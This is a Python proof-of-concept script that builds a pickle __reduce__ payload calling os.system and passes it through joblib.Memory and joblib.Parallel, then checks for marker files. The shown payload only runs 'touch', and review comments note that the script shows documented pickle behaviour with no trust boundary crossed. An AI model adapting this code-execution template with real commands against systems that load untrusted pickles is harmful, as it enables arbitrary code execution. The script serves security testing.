"""Proof of concept: pickle ``__reduce__`` payloads passed through joblib.

The script builds an object whose pickled form calls ``os.system`` when it is
loaded, hands that object to ``joblib.Memory`` and ``joblib.Parallel``, and
then reports whether the marker files written by the payload exist.

NOTE(review): the payload object is constructed by this very process, so the
script demonstrates the documented behavior of pickle (loading a pickle can
run arbitrary callables) rather than data crossing a trust boundary. Confirm
the threat model before treating a "VULNERABLE" result as a finding.
"""

import os
import shutil
import time

import joblib
from joblib import Parallel, delayed

# 1. Setup a dynamic cache directory using the current timestamp.
# The name changes every second, so separate runs do not share a joblib cache.
timestamp = int(time.time())
cache_dir = f"./cache_{timestamp}"

# Marker files the payload creates in the current working directory, one per
# tested vector. They must match the names produced by JoblibExploit.__reduce__.
_MARKER_FILES = ("MEMORY_SUCCESS", "PARALLEL_SUCCESS")


class JoblibExploit:
    """Object whose pickle stream runs a shell command when it is loaded.

    Args:
        vector_name: Label of the vector under test; the payload creates a
            file named ``<vector_name>_SUCCESS`` in the working directory.
    """

    def __init__(self, vector_name):
        self.vector_name = vector_name

    def __reduce__(self):
        """Return the ``(callable, args)`` pair pickle stores for this object.

        Loading the resulting pickle calls ``os.system`` with the ``touch``
        command instead of rebuilding a ``JoblibExploit`` instance. Pickling
        alone does not run the command.
        """
        # Benign payload: only creates an empty marker file. Relies on a
        # `touch` command being available to the shell.
        success_file = f"{self.vector_name}_SUCCESS"
        return (os.system, (f'touch {success_file}',))


def run_memory_test():
    """Pass a payload object through a function cached with ``joblib.Memory``."""
    print(f"[*] Testing Vector 1: joblib.Memory (Cache dir: {cache_dir})")
    mem = joblib.Memory(cache_dir)

    @mem.cache
    def cached_function(data):
        return data

    # NOTE(review): the payload fires only if joblib loads the pickled object
    # back. Whether a first call against an empty cache does so is not
    # visible from this file -- confirm against the joblib version in use.
    cached_function(JoblibExploit("MEMORY"))


def run_parallel_test():
    """Pass a payload object as a task argument to ``joblib.Parallel``.

    Errors raised by the parallel call are reported and otherwise ignored so
    that ``verify_results`` can still run afterwards.
    """
    print("[*] Testing Vector 2: joblib.Parallel (Task Distribution)")

    def worker(data):
        return data

    # NOTE(review): presumably the argument is pickled to reach a worker
    # process and loaded there; this depends on the active joblib backend.
    try:
        Parallel(n_jobs=2)(
            delayed(worker)(JoblibExploit("PARALLEL")) for _ in range(1)
        )
    except Exception as exc:
        # Best effort: keep going, but say why the vector failed instead of
        # hiding it. A bare ``except`` would also trap KeyboardInterrupt.
        print(f"[!] Parallel test raised {type(exc).__name__}: {exc}")


def verify_results():
    """Print the per-vector status and remove the cache directory.

    A vector is reported as VULNERABLE when its marker file exists in the
    current working directory.
    """
    mem_ok = os.path.exists("MEMORY_SUCCESS")
    par_ok = os.path.exists("PARALLEL_SUCCESS")

    print("\n" + "=" * 30)
    print(f"[+] Memory ACE Status: {'VULNERABLE' if mem_ok else 'FAILED'}")
    print(f"[+] Parallel ACE Status: {'VULNERABLE' if par_ok else 'FAILED'}")
    print("=" * 30)

    if mem_ok and par_ok:
        print("\n[CRITICAL] Exploitation Successful: Arbitrary Code Execution confirmed.")

    # Cleanup the newly created cache directory regardless of the outcome so
    # failed runs do not leave ./cache_<timestamp> directories behind.
    if os.path.exists(cache_dir):
        shutil.rmtree(cache_dir)


def _remove_stale_markers():
    """Delete marker files left by an earlier run to avoid false positives."""
    for marker in _MARKER_FILES:
        try:
            os.remove(marker)
        except FileNotFoundError:
            pass


if __name__ == "__main__":
    print("--- Starting Joblib Full ACE Proof of Concept ---")
    _remove_stale_markers()
    run_memory_test()
    run_parallel_test()
    verify_results()